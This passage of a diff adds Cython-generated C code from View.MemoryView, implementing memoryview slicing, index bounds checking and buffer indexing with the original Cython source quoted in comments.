__Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 767, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_stop = __pyx_t_1; + + /* "View.MemoryView":768 + * have_start = index.start is not None + * have_stop = index.stop is not None + * have_step = index.step is not None # <<<<<<<<<<<<<< + * + * slice_memviewslice( + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 768, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_step = __pyx_t_1; + + /* "View.MemoryView":770 + * have_step = index.step is not None + * + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_start, __pyx_v_stop, __pyx_v_step, __pyx_v_have_start, __pyx_v_have_stop, __pyx_v_have_step, 1); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 770, __pyx_L1_error) + + /* "View.MemoryView":776 + * have_start, have_stop, have_step, + * True) + * new_ndim += 1 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + } + __pyx_L6:; + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":780 + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, # <<<<<<<<<<<<<< + * memviewsliceobj.to_dtype_func, + * memview.dtype_is_object) + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 780, __pyx_L1_error) } + + /* "View.MemoryView":781 + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * else: + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 781, __pyx_L1_error) } + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, __pyx_v_memviewsliceobj->to_object_func, __pyx_v_memviewsliceobj->to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 779, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 779, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + } + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + /*else*/ { + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":785 + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, NULL, NULL, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 784, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 784, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memview_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_memviewsliceobj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *__pyx_v_dst, Py_ssize_t __pyx_v_shape, Py_ssize_t __pyx_v_stride, Py_ssize_t __pyx_v_suboffset, int __pyx_v_dim, int __pyx_v_new_ndim, int *__pyx_v_suboffset_dim, Py_ssize_t __pyx_v_start, Py_ssize_t __pyx_v_stop, Py_ssize_t __pyx_v_step, int __pyx_v_have_start, int __pyx_v_have_stop, int __pyx_v_have_step, int __pyx_v_is_slice) { + Py_ssize_t __pyx_v_new_shape; + int __pyx_v_negative_step; + int __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + __pyx_t_1 = (!__pyx_v_is_slice); + if (__pyx_t_1) { + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + __pyx_t_1 = (__pyx_v_start < 0); + if (__pyx_t_1) { + + /* "View.MemoryView":816 + * + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + } + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + __pyx_t_1 = (0 <= __pyx_v_start); + if (__pyx_t_1) { + __pyx_t_1 = (__pyx_v_start < __pyx_v_shape); + } + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":818 + * start += shape + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 818, __pyx_L1_error) + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_have_step != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":822 + * + * if have_step: + * negative_step = step < 0 # <<<<<<<<<<<<<< + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + */ + __pyx_v_negative_step = (__pyx_v_step < 0); + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + __pyx_t_2 = (__pyx_v_step == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":824 + * negative_step = step < 0 + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * negative_step = False + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 824, __pyx_L1_error) + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":826 + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + * negative_step = False # <<<<<<<<<<<<<< + * step = 1 + * + */ + /*else*/ { + __pyx_v_negative_step = 0; + + /* "View.MemoryView":827 + * else: + * negative_step = False + * step = 1 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_step = 1; + } + __pyx_L6:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + __pyx_t_2 = (__pyx_v_have_start != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":832 + * if have_start: + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if start < 0: + * start = 0 + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":834 + * start += shape + * if start < 0: + * start = 0 # <<<<<<<<<<<<<< + * elif start >= shape: + * if negative_step: + */ + __pyx_v_start = 0; + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + } + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":835 + * if start < 0: + * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + __pyx_t_2 = (__pyx_v_start >= __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + if (__pyx_v_negative_step) { + + /* "View.MemoryView":837 + * elif start >= shape: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = shape + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":839 + * start = shape - 1 + * else: + * start = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + /*else*/ { + __pyx_v_start = __pyx_v_shape; + } + __pyx_L11:; + + /* "View.MemoryView":835 + * if start < 0: + * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + } + __pyx_L9:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + goto __pyx_L8; + } + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":842 + * else: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = 0 + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L12; + } + + /* "View.MemoryView":844 + * start = shape - 1 + * else: + * start = 0 # <<<<<<<<<<<<<< + * + * if have_stop: + */ + /*else*/ { + __pyx_v_start = 0; + } + __pyx_L12:; + } + __pyx_L8:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + __pyx_t_2 = (__pyx_v_have_stop != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":848 + * if have_stop: + * if stop < 0: + * stop += shape # <<<<<<<<<<<<<< + * if stop < 0: + * stop = 0 + */ + __pyx_v_stop = (__pyx_v_stop + __pyx_v_shape); + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":850 + * stop += shape + * if stop < 0: + * stop = 0 # <<<<<<<<<<<<<< + * elif stop > shape: + * stop = shape + */ + __pyx_v_stop = 0; + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + } + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + goto __pyx_L14; + } + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + __pyx_t_2 = (__pyx_v_stop > __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":852 + * stop = 0 + * elif stop > shape: + * stop = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + __pyx_v_stop = __pyx_v_shape; + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + } + __pyx_L14:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + goto __pyx_L13; + } + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":855 + * else: + * if negative_step: + * stop = -1 # <<<<<<<<<<<<<< + * else: + * stop = shape + */ + __pyx_v_stop = -1L; + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + goto __pyx_L16; + } + + /* "View.MemoryView":857 + * stop = -1 + * else: + * stop = shape # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_v_stop = __pyx_v_shape; + } + __pyx_L16:; + } + __pyx_L13:; + + /* "View.MemoryView":861 + * + * with cython.cdivision(True): + * new_shape = (stop - start) // step # <<<<<<<<<<<<<< + * + * if (stop - start) - step * new_shape: + */ + __pyx_v_new_shape = ((__pyx_v_stop - __pyx_v_start) / __pyx_v_step); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + __pyx_t_2 = (((__pyx_v_stop - __pyx_v_start) - (__pyx_v_step * __pyx_v_new_shape)) != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":864 + * + * if (stop - start) - step * new_shape: + * new_shape += 1 # <<<<<<<<<<<<<< + * + * if new_shape < 0: + */ + __pyx_v_new_shape = (__pyx_v_new_shape + 1); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + } + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + __pyx_t_2 = (__pyx_v_new_shape < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":867 + * + * if new_shape < 0: + * new_shape = 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_new_shape = 0; + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + } + + /* "View.MemoryView":870 + * + * + * dst.strides[new_ndim] = stride * step # <<<<<<<<<<<<<< + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset + */ + (__pyx_v_dst->strides[__pyx_v_new_ndim]) = (__pyx_v_stride * __pyx_v_step); + + /* "View.MemoryView":871 + * + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape # <<<<<<<<<<<<<< + * dst.suboffsets[new_ndim] = suboffset + * + */ + (__pyx_v_dst->shape[__pyx_v_new_ndim]) = __pyx_v_new_shape; + + /* "View.MemoryView":872 + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_dst->suboffsets[__pyx_v_new_ndim]) = __pyx_v_suboffset; + } + __pyx_L3:; + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + __pyx_t_2 = ((__pyx_v_suboffset_dim[0]) < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":876 + * + * if suboffset_dim[0] < 0: + * dst.data += start * stride # <<<<<<<<<<<<<< + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride + */ + __pyx_v_dst->data = (__pyx_v_dst->data + (__pyx_v_start * __pyx_v_stride)); + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + goto __pyx_L19; + } + + /* "View.MemoryView":878 + * dst.data += start * stride + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride # <<<<<<<<<<<<<< + * + * if suboffset >= 0: + */ + /*else*/ { + __pyx_t_3 = (__pyx_v_suboffset_dim[0]); + (__pyx_v_dst->suboffsets[__pyx_t_3]) = ((__pyx_v_dst->suboffsets[__pyx_t_3]) + (__pyx_v_start * __pyx_v_stride)); + } + __pyx_L19:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + __pyx_t_2 = (!__pyx_v_is_slice); + if (__pyx_t_2) { + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + __pyx_t_2 = (__pyx_v_new_ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":883 + * if not is_slice: + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset # <<<<<<<<<<<<<< + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + */ + __pyx_v_dst->data = ((((char **)__pyx_v_dst->data)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + goto __pyx_L22; + } + + /* "View.MemoryView":885 + * dst.data = ( dst.data)[0] + suboffset + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " # <<<<<<<<<<<<<< + * "must be indexed and not sliced", dim) + * else: + */ + /*else*/ { + + /* "View.MemoryView":886 + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + * "must be indexed and not sliced", dim) # <<<<<<<<<<<<<< + * else: + * suboffset_dim[0] = new_ndim + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 885, __pyx_L1_error) + } + __pyx_L22:; + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + goto __pyx_L21; + } + + /* "View.MemoryView":888 + * "must be indexed and not sliced", dim) + * else: + * suboffset_dim[0] = new_ndim # <<<<<<<<<<<<<< + * + * return 0 + */ + /*else*/ { + (__pyx_v_suboffset_dim[0]) = __pyx_v_new_ndim; + } + __pyx_L21:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + } + + /* "View.MemoryView":890 + * suboffset_dim[0] = new_ndim + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.slice_memviewslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + +static char *__pyx_pybuffer_index(Py_buffer *__pyx_v_view, char *__pyx_v_bufp, Py_ssize_t __pyx_v_index, Py_ssize_t __pyx_v_dim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_suboffset; + Py_ssize_t __pyx_v_itemsize; + char *__pyx_v_resultp; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_UCS4 __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("pybuffer_index", 0); + + /* "View.MemoryView":898 + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 # <<<<<<<<<<<<<< + * cdef Py_ssize_t itemsize = view.itemsize + * cdef char *resultp + */ + __pyx_v_suboffset = -1L; + + /* "View.MemoryView":899 + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + * cdef Py_ssize_t itemsize = view.itemsize # <<<<<<<<<<<<<< + * cdef char *resultp + * + */ + __pyx_t_1 = __pyx_v_view->itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + __pyx_t_2 = (__pyx_v_view->ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":903 + * + * if view.ndim == 0: + * shape = view.len // itemsize # <<<<<<<<<<<<<< + * stride = itemsize + * else: + */ + if (unlikely(__pyx_v_itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_view->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + __pyx_v_shape = __Pyx_div_Py_ssize_t(__pyx_v_view->len, __pyx_v_itemsize); + + /* "View.MemoryView":904 + * if view.ndim == 0: + * shape = view.len // itemsize + * stride = itemsize # <<<<<<<<<<<<<< + * else: + * shape = view.shape[dim] + */ + __pyx_v_stride = __pyx_v_itemsize; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + goto __pyx_L3; + } + + /* "View.MemoryView":906 + * stride = itemsize + * else: + * shape = view.shape[dim] # <<<<<<<<<<<<<< + * stride = view.strides[dim] + * if view.suboffsets != NULL: + */ + /*else*/ { + __pyx_v_shape = (__pyx_v_view->shape[__pyx_v_dim]); + + /* "View.MemoryView":907 + * else: + * shape = view.shape[dim] + * stride = view.strides[dim] # <<<<<<<<<<<<<< + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] + */ + __pyx_v_stride = (__pyx_v_view->strides[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + __pyx_t_2 = (__pyx_v_view->suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":909 + * stride = view.strides[dim] + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] # <<<<<<<<<<<<<< + * + * if index < 0: + */ + __pyx_v_suboffset = (__pyx_v_view->suboffsets[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + } + } + __pyx_L3:; + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":912 + * + * if index < 0: + * index += view.shape[dim] # <<<<<<<<<<<<<< + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + */ + __pyx_v_index = (__pyx_v_index + (__pyx_v_view->shape[__pyx_v_dim])); + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (unlikely(__pyx_t_2)) { 